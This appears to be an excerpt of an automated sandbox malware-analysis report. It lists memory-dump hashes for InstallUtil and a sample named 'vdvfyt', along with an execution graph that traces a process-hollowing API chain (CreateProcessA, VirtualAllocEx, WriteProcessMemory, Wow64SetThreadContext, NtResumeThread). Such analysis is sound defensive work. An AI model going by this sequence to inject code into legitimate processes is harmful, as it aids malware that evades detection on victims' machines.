                                                                                    • Opcode Fuzzy Hash: 741f96c5470667dfaebb1ebe49350f9a01605c59eb3434433673a7aea4477812
                                                                                    • Instruction Fuzzy Hash: F4114C31B186512BCBA2873CA4A475F7BE6CBCA710F14846EE606CF386DE11CD0247D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a52f89b621ec3df09a0b877b6ab4bcd81e7130ed6dbb32cb5937250797cccb70
                                                                                    • Instruction ID: bb73409d0ed06bd5590dabea729322ba42843cc7ed535e420879f9a066e8d784
                                                                                    • Opcode Fuzzy Hash: a52f89b621ec3df09a0b877b6ab4bcd81e7130ed6dbb32cb5937250797cccb70
                                                                                    • Instruction Fuzzy Hash: 6E11A131B101299BDF84AB68C8246AF77EAEBC8711F444139DA0AE7350EF65DC019BD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cbb9ce6ea01460250787b54da1cf542f055ca08e4ed3f5caa0d67f58bb24cbd9
                                                                                    • Instruction ID: 442e8836cecf0533bccf54136d4cdd46e11608d0e55cf8870b2ed8b1170542ae
                                                                                    • Opcode Fuzzy Hash: cbb9ce6ea01460250787b54da1cf542f055ca08e4ed3f5caa0d67f58bb24cbd9
                                                                                    • Instruction Fuzzy Hash: 6921E3B1D01259AFCB40DF9AD884ACEFBB4FB48710F10812AE918A7340C774AA44CFE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a23ea74f0ec020fdcb60897eb2ae57e174e03f28e1896163c593ce2d111845a0
                                                                                    • Instruction ID: daca17c85fbd1268688a87e46e07a9ac8d6194292cb0f19a4adde3e4e482f503
                                                                                    • Opcode Fuzzy Hash: a23ea74f0ec020fdcb60897eb2ae57e174e03f28e1896163c593ce2d111845a0
                                                                                    • Instruction Fuzzy Hash: 4701D231B102516FCBA2963C985071BB7EADBC9710F10846EF20ECB381D965CD4243E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737448443.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_185d000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                    • Instruction ID: 458723b22de6e444eb7497a4647fd9d2d9c365e9b0204127e04055a76019e9b0
                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                    • Instruction Fuzzy Hash: BA11DC76504280CFCB02CF44D9C0B56BF62FB84320F24C6A9DC094B657C33AE55ACBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737510269.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_186d000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                    • Instruction ID: 51c8b97c3c27495d1f12b87baf35f89893b601bc194bb41146e61f68beaaddeb
                                                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                    • Instruction Fuzzy Hash: 5911BE75604284CFCB12CF54D5C0B15FB61FB84314F24C6AAD8898B657C33AD44ACB62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 75c9fa421d4c607f5191ba030fb3a14c5174c53a28d41b049ba1cf6e40718da6
                                                                                    • Instruction ID: 11fbaa6ec687bcb1bf91bba816b47b9950f0450d8264dead0b8b186c3cd41661
                                                                                    • Opcode Fuzzy Hash: 75c9fa421d4c607f5191ba030fb3a14c5174c53a28d41b049ba1cf6e40718da6
                                                                                    • Instruction Fuzzy Hash: B411D0B1D01259AFCB00DF9AD884ADEFBF4FB48310F10812AE918A7340C774AA54CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aea7d72b65bc2f2849a51cd6a7490e7915ce8a566a798de6fc8b1525761a3db7
                                                                                    • Instruction ID: 32005d27dfc4a5876fe07185a3dd320009ce5250779537d2ec9450b7f891bfb2
                                                                                    • Opcode Fuzzy Hash: aea7d72b65bc2f2849a51cd6a7490e7915ce8a566a798de6fc8b1525761a3db7
                                                                                    • Instruction Fuzzy Hash: 0201AD31B101256BDBA0966DA850B1BB2DBDBC9B20F20843EE60ECB380EE61DD0243D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 910c5ddc5056329f93db8274fee30a36c952a07ad1c0b6c448b478cc0a4a9fb6
                                                                                    • Instruction ID: 0073695b375b1bf0793995b6a15831a2544b617d953fd2c03a14a9259975f7e7
                                                                                    • Opcode Fuzzy Hash: 910c5ddc5056329f93db8274fee30a36c952a07ad1c0b6c448b478cc0a4a9fb6
                                                                                    • Instruction Fuzzy Hash: 6701B171B141695BDB94AE68DC207AB7BEADBC8710F44413EDA09D7280EE658C0187D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a62389c0e741082f9a09a0cdda854e0c26054155eb8f5fbf77462cdb30bb1b61
                                                                                    • Instruction ID: 581b5ca182330a72f04cb632ebe7f462d3d688675aa9032aff70b8c3de9ffd2c
                                                                                    • Opcode Fuzzy Hash: a62389c0e741082f9a09a0cdda854e0c26054155eb8f5fbf77462cdb30bb1b61
                                                                                    • Instruction Fuzzy Hash: CC01A435B101122BDBA5972CA450B2F67D7D7CDB20F10883DE60ACB350EE25DD0247D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d75d698d35fd572e858742291ce49c731ebaece52af09a13cd8ac6077d20f8be
                                                                                    • Instruction ID: 0b4d4b09d0ce0601b719b3d1f82f892a44b672c14383dd1939c8595d9be539d1
                                                                                    • Opcode Fuzzy Hash: d75d698d35fd572e858742291ce49c731ebaece52af09a13cd8ac6077d20f8be
                                                                                    • Instruction Fuzzy Hash: 1B014F70B201158FDB959B6CD5A472AB7D6EB89720F10842DE60ECB381DE25EE828791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d61f9987063feb79eb30b2d11ad482d2a84c8ee9c01050e07d01fb39e63ab187
                                                                                    • Instruction ID: 1d7ba64b17958063ead38fb43371ad9d222e661fecd0f34dab24dc543452b5b8
                                                                                    • Opcode Fuzzy Hash: d61f9987063feb79eb30b2d11ad482d2a84c8ee9c01050e07d01fb39e63ab187
                                                                                    • Instruction Fuzzy Hash: AE018630B201145BDB909A6CD46472FB7DAEB89720F108428E60EC7340DE25EE428791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68756677e4eefddc8a85fcea1437ea0732191aed61fa7be34d3bf61905be004c
                                                                                    • Instruction ID: 3fcbe553eca117fb89d7c6d26812d4d071f18587e3ebbda4ca2ac4592d0ca993
                                                                                    • Opcode Fuzzy Hash: 68756677e4eefddc8a85fcea1437ea0732191aed61fa7be34d3bf61905be004c
                                                                                    • Instruction Fuzzy Hash: 5D01A931F202285BDF94DA69F85069AB7B5F785750F00853EE901EB340DB31AD0487C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f5db017bc8fb3a20343c6f81dfa24a8ab4ed715e67470118186affa2535d92d
                                                                                    • Instruction ID: 544f87cd1c69341372e274bd5cc5e21aebf2e91f28378c76702e7c8d58373912
                                                                                    • Opcode Fuzzy Hash: 2f5db017bc8fb3a20343c6f81dfa24a8ab4ed715e67470118186affa2535d92d
                                                                                    • Instruction Fuzzy Hash: 84F0FF35B21201CFDFE48B49E9902BCB7B5EB80310F14416ACA05CB261C735DE09CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ed66891a4bb79c88b11607276202c54201970b07190a58b607bdf1a1dc435fc9
                                                                                    • Instruction ID: 26ce12e1bf89286e3453f9c2d50a003204ab1a9e36a3dfd77f26f3b655b0dc95
                                                                                    • Opcode Fuzzy Hash: ed66891a4bb79c88b11607276202c54201970b07190a58b607bdf1a1dc435fc9
                                                                                    • Instruction Fuzzy Hash: 56E08071D24149ABDFD0DF71C90575A77FDE701304F61896CD645E7202E276CA019780

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:97.7%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:262
                                                                                    Total number of Limit Nodes:16
                                                                                    execution_graph 64640 5b96078 64641 5b9608d 64640->64641 64647 5b962e9 64641->64647 64650 5b96277 64641->64650 64653 5b960aa 64641->64653 64656 5b960b8 64641->64656 64648 5b96115 64647->64648 64659 5b97630 64648->64659 64651 5b96115 64650->64651 64652 5b97630 9 API calls 64651->64652 64652->64651 64654 5b960ae 64653->64654 64655 5b97630 9 API calls 64654->64655 64655->64654 64657 5b960c3 64656->64657 64658 5b97630 9 API calls 64657->64658 64658->64657 64660 5b97655 64659->64660 64664 5b97b82 64660->64664 64669 5b97907 64660->64669 64661 5b97677 64661->64648 64665 5b97908 64664->64665 64666 5b976fb 64664->64666 64665->64666 64674 5b98000 64665->64674 64689 5b97ff0 64665->64689 64666->64661 64670 5b9790d 64669->64670 64672 5b98000 9 API calls 64670->64672 64673 5b97ff0 9 API calls 64670->64673 64671 5b976fb 64671->64661 64672->64671 64673->64671 64675 5b98015 64674->64675 64685 5b98037 64675->64685 64704 5b98e81 64675->64704 64709 5b98bce 64675->64709 64714 5b992ef 64675->64714 64718 5b9904c 64675->64718 64722 5b988cb 64675->64722 64727 5b98eb6 64675->64727 64732 5b98db4 64675->64732 64737 5b98ab5 64675->64737 64742 5b987b3 64675->64742 64747 5b98430 64675->64747 64752 5b98a70 64675->64752 64757 5b99350 64675->64757 64685->64666 64690 5b98015 64689->64690 64691 5b99350 Wow64SetThreadContext 64690->64691 64692 5b98a70 2 API calls 64690->64692 64693 5b98430 2 API calls 64690->64693 64694 5b987b3 2 API calls 64690->64694 64695 5b98ab5 2 API calls 64690->64695 64696 5b98db4 2 API calls 64690->64696 64697 5b98eb6 2 API calls 64690->64697 64698 5b988cb 2 API calls 64690->64698 64699 5b9904c Wow64SetThreadContext 64690->64699 64700 5b98037 64690->64700 64701 5b992ef Wow64SetThreadContext 64690->64701 64702 5b98bce 2 API calls 64690->64702 64703 5b98e81 2 API calls 64690->64703 64691->64700 64692->64700 64693->64700 64694->64700 64695->64700 64696->64700 64697->64700 64698->64700 64699->64700 64700->64666 64701->64700 64702->64700 64703->64700 64705 5b98196 64704->64705 64706 5b98e45 64704->64706 64706->64705 64761 5b803ea 64706->64761 64765 5b803f0 64706->64765 64710 5b98ab5 64709->64710 64711 5b98196 64710->64711 64769 5b80158 64710->64769 64773 5b80152 64710->64773 64715 5b992ee 64714->64715 64715->64714 64716 5b99356 64715->64716 64777 6cefcd0 64715->64777 64719 5b99052 64718->64719 64721 6cefcd0 Wow64SetThreadContext 64719->64721 64720 5b99094 64721->64720 64723 5b988da 64722->64723 64725 5b803ea WriteProcessMemory 64723->64725 64726 5b803f0 WriteProcessMemory 64723->64726 64724 5b98196 64725->64724 64726->64724 64728 5b98ab5 64727->64728 64729 5b98196 64727->64729 64728->64727 64730 5b80158 VirtualAllocEx 64728->64730 64731 5b80152 VirtualAllocEx 64728->64731 64730->64728 64731->64728 64733 5b98dc3 64732->64733 64735 5b803ea WriteProcessMemory 64733->64735 64736 5b803f0 WriteProcessMemory 64733->64736 64734 5b98196 64735->64734 64736->64734 64738 5b98abf 64737->64738 64738->64737 64739 5b98196 64738->64739 64740 5b80158 VirtualAllocEx 64738->64740 64741 5b80152 VirtualAllocEx 64738->64741 64740->64738 64741->64738 64743 5b987cb 64742->64743 64781 5b998ff 64743->64781 64785 5b99900 64743->64785 64744 5b987e3 64748 5b9843f 64747->64748 64750 5b803ea WriteProcessMemory 64748->64750 64751 5b803f0 WriteProcessMemory 64748->64751 64749 5b98408 64749->64685 64750->64749 64751->64749 64753 5b98196 64752->64753 64754 5b991c8 64752->64754 64802 5b80a68 64754->64802 64806 5b80a60 64754->64806 64758 5b99356 64757->64758 64759 5b992ee 64757->64759 64759->64757 64760 6cefcd0 Wow64SetThreadContext 64759->64760 64760->64759 64762 5b80438 WriteProcessMemory 64761->64762 64764 5b8048f 64762->64764 64764->64705 64766 5b80438 WriteProcessMemory 64765->64766 64768 5b8048f 64766->64768 64768->64705 64770 5b80198 VirtualAllocEx 64769->64770 64772 5b801d5 64770->64772 64772->64710 64774 5b80198 VirtualAllocEx 64773->64774 64776 5b801d5 64774->64776 64776->64710 64778 6cefd15 Wow64SetThreadContext 64777->64778 64780 6cefd5d 64778->64780 64780->64715 64782 5b99917 64781->64782 64783 5b99939 64782->64783 64789 5b99ac9 64782->64789 64783->64744 64786 5b99917 64785->64786 64787 5b99939 64786->64787 64788 5b99ac9 2 API calls 64786->64788 64787->64744 64788->64787 64790 5b99ad8 64789->64790 64794 5b9f8d0 64790->64794 64798 5b9f8c4 64790->64798 64795 5b9f934 CreateProcessA 64794->64795 64797 5b9fabc 64795->64797 64799 5b9f8d0 CreateProcessA 64798->64799 64801 5b9fabc 64799->64801 64803 5b80a91 NtResumeThread 64802->64803 64805 5b80ae5 64803->64805 64805->64753 64807 5b80a66 NtResumeThread 64806->64807 64809 5b80ae5 64807->64809 64809->64753 64835 69bccc8 64836 69bccdd 64835->64836 64839 69bcdc1 64836->64839 64840 69bcde4 64839->64840 64841 69bccf3 64840->64841 64842 69bdae8 VirtualProtect 64840->64842 64843 69bdae1 VirtualProtect 64840->64843 64842->64840 64843->64840 64516 2275590 64519 2275599 64516->64519 64517 22755a5 64519->64517 64520 227413c 64519->64520 64521 2274147 64520->64521 64524 2274268 64521->64524 64523 2275605 64523->64519 64525 2274273 64524->64525 64528 2274278 64525->64528 64527 22756a5 64527->64523 64529 2274283 64528->64529 64532 22742a8 64529->64532 64531 2275782 64531->64527 64533 22742b3 64532->64533 64536 22742d8 64533->64536 64535 2275894 64535->64531 64537 22742e3 64536->64537 64538 227887b 64537->64538 64542 227b298 64537->64542 64539 22788b9 64538->64539 64546 227d390 64538->64546 64539->64535 64550 227b2d0 64542->64550 64553 227b2bf 64542->64553 64543 227b2ae 64543->64538 64547 227d3b1 64546->64547 64548 227d3d5 64547->64548 64561 227d540 64547->64561 64548->64539 64551 227b2df 64550->64551 64556 227b3b7 64550->64556 64551->64543 64555 227b3b7 GetModuleHandleW 64553->64555 64554 227b2df 64554->64543 64555->64554 64557 227b3fc 64556->64557 64558 227b3d9 64556->64558 64557->64551 64558->64557 64559 227b600 GetModuleHandleW 64558->64559 64560 227b62d 64559->64560 64560->64551 64562 227d54d 64561->64562 64564 227d587 64562->64564 64565 227bd80 64562->64565 64564->64548 64567 227bd8b 64565->64567 64566 227e2a0 64567->64566 64569 227d73c 64567->64569 64570 227d747 64569->64570 64571 22742d8 GetModuleHandleW 64570->64571 64572 227e30f 64571->64572 64572->64566 64810 227da60 64811 227daa6 64810->64811 64814 227dc40 64811->64814 64817 227bda0 64814->64817 64818 227dca8 DuplicateHandle 64817->64818 64819 227db93 64818->64819 64820 6a7e860 64821 6a7e8a0 VirtualAlloc 64820->64821 64823 6a7e8da 64821->64823 64824 5b9ee70 64825 5b9eebe NtProtectVirtualMemory 64824->64825 64827 5b9ef08 64825->64827 64495 93d118 64497 93d130 64495->64497 64496 93d18b 64497->64496 64499 6a7de80 64497->64499 64500 6a7dea8 64499->64500 64503 6a7e310 64500->64503 64501 6a7decf 64504 6a7e33d 64503->64504 64507 6a7e4d3 64504->64507 64508 6a7d428 64504->64508 64507->64501 64510 6a7d44f 64508->64510 64512 6a7d878 64510->64512 64513 6a7d8c0 VirtualProtect 64512->64513 64515 6a7d50c 64513->64515 64515->64501 64573 69bde20 64574 69bde35 64573->64574 64578 69bdf73 64574->64578 64587 69bdef6 64574->64587 64575 69bde4b 64582 69bdf79 64578->64582 64579 69be156 64585 69bdae8 VirtualProtect 64579->64585 64586 69bdae1 VirtualProtect 64579->64586 64580 69be248 64580->64575 64581 69be189 64581->64575 64582->64579 64582->64580 64596 69bdae8 64582->64596 64600 69bdae1 64582->64600 64585->64581 64586->64581 64591 69bdf15 64587->64591 64588 69be156 64594 69bdae8 VirtualProtect 64588->64594 64595 69bdae1 VirtualProtect 64588->64595 64589 69be248 64589->64575 64590 69be189 64590->64575 64591->64588 64591->64589 64592 69bdae8 VirtualProtect 64591->64592 64593 69bdae1 VirtualProtect 64591->64593 64592->64591 64593->64591 64594->64590 64595->64590 64597 69bdb30 VirtualProtect 64596->64597 64599 69bdb6b 64597->64599 64599->64582 64601 69bdb30 VirtualProtect 64600->64601 64603 69bdb6b 64601->64603 64603->64582 64604 69b93a0 64605 69b93b5 64604->64605 64610 69b93d1 64605->64610 64616 69b9649 64605->64616 64622 69b93e0 64605->64622 64606 69b93cb 64612 69b9407 64610->64612 64611 69b944b 64611->64606 64612->64611 64628 69bca2a 64612->64628 64632 69bca30 64612->64632 64636 69bcae0 64612->64636 64618 69b943c 64616->64618 64617 69b944b 64617->64606 64618->64617 64619 69bca2a SleepEx 64618->64619 64620 69bcae0 SleepEx 64618->64620 64621 69bca30 SleepEx 64618->64621 64619->64618 64620->64618 64621->64618 64623 69b9407 64622->64623 64624 69b944b 64623->64624 64625 69bca2a SleepEx 64623->64625 64626 69bcae0 SleepEx 64623->64626 64627 69bca30 SleepEx 64623->64627 64624->64606 64625->64623 64626->64623 64627->64623 64629 69bca35 SleepEx 64628->64629 64631 69bcaae 64629->64631 64631->64612 64633 69bca70 SleepEx 64632->64633 64635 69bcaae 64633->64635 64635->64612 64637 69bca86 SleepEx 64636->64637 64639 69bcaef 64636->64639 64638 69bcaae 64637->64638 64638->64612 64639->64612 64828 5ce6100 64829 5ce611a 64828->64829 64830 5ce612a 64829->64830 64832 6a75f78 64829->64832 64834 6a7d428 VirtualProtect 64832->64834 64833 6a701d9 64834->64833
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: c118e65c96e10506541e3411cafcc0bb5cce92ef3e4c0457590ea1252e110f51
                                                                                    • Instruction ID: c0db3c7ceb2947cede7d2428eecc8eeba61ef15e328fdbfe107c86fa9d43281f
                                                                                    • Opcode Fuzzy Hash: c118e65c96e10506541e3411cafcc0bb5cce92ef3e4c0457590ea1252e110f51
                                                                                    • Instruction Fuzzy Hash: 84B2F634A00218CFDB54DFA4C994BADB7B6BF88701F158199EA05EB3A9DB709C81CF51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: 03ef7accc2ad6b3e3909ac4d31651cbaf0c7d6d18ea173b23ad24ec5242b6b82
                                                                                    • Instruction ID: 1c2c07d391ba4f04a94e87519ca9e01f5439d5521a303c45fbf2861a3c83f3a4
                                                                                    • Opcode Fuzzy Hash: 03ef7accc2ad6b3e3909ac4d31651cbaf0c7d6d18ea173b23ad24ec5242b6b82
                                                                                    • Instruction Fuzzy Hash: 1922F834A00219CFDB64DFA4C994BADB7B2BF48305F158099DA09EB3A5DB70AD81CF51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1057 5b9ee69-5b9ef06 NtProtectVirtualMemory 1060 5b9ef08-5b9ef0e 1057->1060 1061 5b9ef0f-5b9ef34 1057->1061 1060->1061
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B9EEF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: b54a09535833aa6235b591103bb80ebf7982bd91e75c5017ee6fbabfc50bc999
                                                                                    • Instruction ID: 35548602c275e453df35e5a1e4c84442de0d462260e623f19a7243688f050102
                                                                                    • Opcode Fuzzy Hash: b54a09535833aa6235b591103bb80ebf7982bd91e75c5017ee6fbabfc50bc999
                                                                                    • Instruction Fuzzy Hash: F02113B1D003499FDB10DFAAD884ADEFBF5BF48310F20842AE459A7240C775A900CB60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1065 5b9ee70-5b9ef06 NtProtectVirtualMemory 1068 5b9ef08-5b9ef0e 1065->1068 1069 5b9ef0f-5b9ef34 1065->1069 1068->1069
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B9EEF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: 4163d73e02f303bb9fee62e9d6953354607cae07549c55961b1cb08698290906
                                                                                    • Instruction ID: 95a8a3da3cf7b29a9a9c5e4ba7f61fc754a5b1c77fd5499cb1ef8169e659be49
                                                                                    • Opcode Fuzzy Hash: 4163d73e02f303bb9fee62e9d6953354607cae07549c55961b1cb08698290906
                                                                                    • Instruction Fuzzy Hash: FA2100B1D003499FDB10DFAAD884ADEFBF5FF88310F20842AE519A7240C775A900CBA0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 05B80AD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 5328e685dc8ae0babaa3e37457c0222482f89a2ad4da2f5c8556d2756964fa78
                                                                                    • Instruction ID: 21c55b8a1cafe90d13badb339570c464708dfa8cb9232572105d272a8a050df9
                                                                                    • Opcode Fuzzy Hash: 5328e685dc8ae0babaa3e37457c0222482f89a2ad4da2f5c8556d2756964fa78
                                                                                    • Instruction Fuzzy Hash: E51106B1D003098FDB14EFAAC5847AEFBF5AF88210F15842AD459A7250D775A905CFA0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 05B80AD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: baf7e27fbba5203c7d1e647fa9162c0cef4656cf764e08fa77570fcace4ea5ff
                                                                                    • Instruction ID: 8188682729ed52bad725783cea7aacd61e8a69ba5b80f6efbea8510dd042b104
                                                                                    • Opcode Fuzzy Hash: baf7e27fbba5203c7d1e647fa9162c0cef4656cf764e08fa77570fcace4ea5ff
                                                                                    • Instruction Fuzzy Hash: 5D11E7B1D003098FDB10EFAAC4857AEFBF4FF88610F54842AD459A7240CB75A945CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851553956.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5ce0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7103079171a8ecd275c63a2d94364fc35bcf9b4fc075228bc6eef5043a4ed8d
                                                                                    • Instruction ID: 60051816eef44fcd369d375a91c500846d6bec0efb230726b497e5cf087c59a2
                                                                                    • Opcode Fuzzy Hash: d7103079171a8ecd275c63a2d94364fc35bcf9b4fc075228bc6eef5043a4ed8d
                                                                                    • Instruction Fuzzy Hash: 97A2B475A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40
